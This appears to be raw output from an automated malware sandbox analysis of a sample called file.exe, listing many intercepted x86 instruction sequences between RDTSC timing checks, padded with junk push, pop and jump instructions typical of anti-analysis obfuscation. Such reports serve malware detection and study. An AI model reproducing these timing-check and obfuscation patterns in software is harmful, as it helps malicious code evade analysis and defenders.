Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1061267 second address: 1061274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FFAACBEF8C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10613F1 second address: 1061418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FFAAD0A8F16h 0x00000009 jmp 00007FFAAD0A8F1Fh 0x0000000e jl 00007FFAAD0A8F16h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1061418 second address: 1061420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10616A2 second address: 10616B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007FFAAD0A8F21h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10616B9 second address: 10616C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1061834 second address: 1061893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F25h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e je 00007FFAAD0A8F16h 0x00000014 popad 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jmp 00007FFAAD0A8F25h 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 pop eax 0x00000021 pop edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FFAAD0A8F25h 0x00000029 jc 00007FFAAD0A8F16h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1061893 second address: 1061897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1061B95 second address: 1061B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1061D17 second address: 1061D22 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FFAACBEF8C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065ED2 second address: 1065ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065ED6 second address: 1065EE0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAACBEF8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065EE0 second address: 1065EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065EE6 second address: 1065F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FFAACBEF8D9h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1066197 second address: 10661BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e add dword ptr [ebp+122D2207h], ebx 0x00000014 push 00000004h 0x00000016 mov dx, bx 0x00000019 push 6ECDDA6Dh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10661BB second address: 10661CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAACBEF8D0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10661CF second address: 10661D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106643B second address: 1066474 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FFAACBEF8CDh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 jmp 00007FFAACBEF8D0h 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1066474 second address: 10664CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FFAAD0A8F1Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FFAAD0A8F18h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 sub edx, 082BF030h 0x0000002e push dword ptr [ebp+122D3100h] 0x00000034 sub edx, dword ptr [ebp+122D2D45h] 0x0000003a call 00007FFAAD0A8F19h 0x0000003f push edi 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10664CC second address: 10664D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10664D0 second address: 10664D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10664D4 second address: 106650A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007FFAACBEF8D7h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jo 00007FFAACBEF8E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FFAACBEF8CBh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106650A second address: 1066524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1066524 second address: 1066529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1066529 second address: 106652E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106652E second address: 1066540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1066540 second address: 1066547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1066547 second address: 106655E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAACBEF8D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1067EB3 second address: 1067EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1067EBA second address: 1067EBF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1067EBF second address: 1067EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30C50 second address: 4A30C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAACBEF8D1h 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 pushfd 0x00000016 jmp 00007FFAACBEF8D0h 0x0000001b sbb ah, FFFFFFB8h 0x0000001e jmp 00007FFAACBEF8CBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30C92 second address: 4A30CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAAD0A8F1Bh 0x00000009 adc si, D67Eh 0x0000000e jmp 00007FFAAD0A8F29h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FFAAD0A8F1Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20AE1 second address: 4A20B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FFAACBEF8D4h 0x0000000a add si, 3B68h 0x0000000f jmp 00007FFAACBEF8CBh 0x00000014 popfd 0x00000015 popad 0x00000016 mov cx, 1D5Fh 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d mov dx, C2D6h 0x00000021 mov si, bx 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FFAACBEF8D2h 0x0000002f sub eax, 0A64F8F8h 0x00000035 jmp 00007FFAACBEF8CBh 0x0000003a popfd 0x0000003b mov bx, ax 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20B48 second address: 4A20B62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFAAD0A8F1Bh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ch, 10h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A60943 second address: 4A609A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FFAACBEF8D3h 0x00000012 pushfd 0x00000013 jmp 00007FFAACBEF8D8h 0x00000018 sub ecx, 358E1DC8h 0x0000001e jmp 00007FFAACBEF8CBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A000C5 second address: 4A000CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A000CA second address: 4A00116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAACBEF8D6h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ebx, 42EE8B84h 0x00000016 mov dl, DBh 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov edi, 3A4DDDB4h 0x00000022 call 00007FFAACBEF8CDh 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00116 second address: 4A0011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0011C second address: 4A00120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00120 second address: 4A00162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FFAAD0A8F24h 0x0000000f push dword ptr [ebp+04h] 0x00000012 jmp 00007FFAAD0A8F20h 0x00000017 push dword ptr [ebp+0Ch] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FFAAD0A8F1Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00162 second address: 4A00171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20832 second address: 4A20836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20836 second address: 4A2083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2083A second address: 4A20840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20840 second address: 4A20876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov edx, 2D587A16h 0x00000012 pop ebx 0x00000013 push ecx 0x00000014 call 00007FFAACBEF8D3h 0x00000019 pop eax 0x0000001a pop edx 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov edx, esi 0x00000022 mov eax, 1D8C7213h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20876 second address: 4A2088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2088E second address: 4A208B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAACBEF8D5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20476 second address: 4A2052B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FFAAD0A8F28h 0x00000008 sbb eax, 550F2AD8h 0x0000000e jmp 00007FFAAD0A8F1Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jmp 00007FFAAD0A8F28h 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FFAAD0A8F21h 0x00000024 sub ah, 00000026h 0x00000027 jmp 00007FFAAD0A8F21h 0x0000002c popfd 0x0000002d jmp 00007FFAAD0A8F20h 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 jmp 00007FFAAD0A8F20h 0x00000039 mov ebp, esp 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007FFAAD0A8F1Dh 0x00000044 jmp 00007FFAAD0A8F1Bh 0x00000049 popfd 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20359 second address: 4A203DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAACBEF8CEh 0x0000000f push eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 pushfd 0x00000013 jmp 00007FFAACBEF8CCh 0x00000018 jmp 00007FFAACBEF8D5h 0x0000001d popfd 0x0000001e pop eax 0x0000001f pushfd 0x00000020 jmp 00007FFAACBEF8D1h 0x00000025 add si, A236h 0x0000002a jmp 00007FFAACBEF8D1h 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A203DD second address: 4A203E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A203E1 second address: 4A203E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A203E7 second address: 4A203FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F21h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A203FC second address: 4A2041B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2041B second address: 4A2041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2041F second address: 4A20425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A200BA second address: 4A200BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A200BE second address: 4A200C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A200C4 second address: 4A20145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 jmp 00007FFAAD0A8F26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dx, ax 0x00000013 mov ebx, esi 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007FFAAD0A8F1Fh 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FFAAD0A8F26h 0x00000022 mov ebp, esp 0x00000024 jmp 00007FFAAD0A8F20h 0x00000029 pop ebp 0x0000002a pushad 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FFAAD0A8F1Ch 0x00000032 adc ch, FFFFFFC8h 0x00000035 jmp 00007FFAAD0A8F1Bh 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20E22 second address: 4A20E28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20E28 second address: 4A20E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAAD0A8F27h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20E52 second address: 4A20E58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20E58 second address: 4A20E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20E5C second address: 4A20EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov ax, C59Bh 0x00000012 movzx ecx, dx 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FFAACBEF8D4h 0x00000020 adc esi, 148C0798h 0x00000026 jmp 00007FFAACBEF8CBh 0x0000002b popfd 0x0000002c mov bx, ax 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A607B1 second address: 4A607B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A607B5 second address: 4A607BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A607BB second address: 4A607E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d call 00007FFAAD0A8F1Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A607E3 second address: 4A607ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 movsx ebx, cx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A607ED second address: 4A60812 instructions: 0x00000000 rdtsc 0x00000002 call 00007FFAAD0A8F28h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A60812 second address: 4A60830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FFAACBEF8D8h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A60830 second address: 4A6084B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A4000D second address: 4A40058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAACBEF8D0h 0x0000000f push eax 0x00000010 jmp 00007FFAACBEF8CBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FFAACBEF8D5h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A40058 second address: 4A40060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A40060 second address: 4A40084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FFAACBEF8D1h 0x00000011 pop esi 0x00000012 mov ebx, 725AEE74h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A40084 second address: 4A4008A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A4008A second address: 4A40107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e jmp 00007FFAACBEF8D0h 0x00000013 and dword ptr [eax], 00000000h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FFAACBEF8CEh 0x0000001d or cx, 7288h 0x00000022 jmp 00007FFAACBEF8CBh 0x00000027 popfd 0x00000028 call 00007FFAACBEF8D8h 0x0000002d pushad 0x0000002e popad 0x0000002f pop eax 0x00000030 popad 0x00000031 and dword ptr [eax+04h], 00000000h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FFAACBEF8CAh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A40107 second address: 4A40116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, CDh 0x00000005 push ecx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30BCC second address: 4A30BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
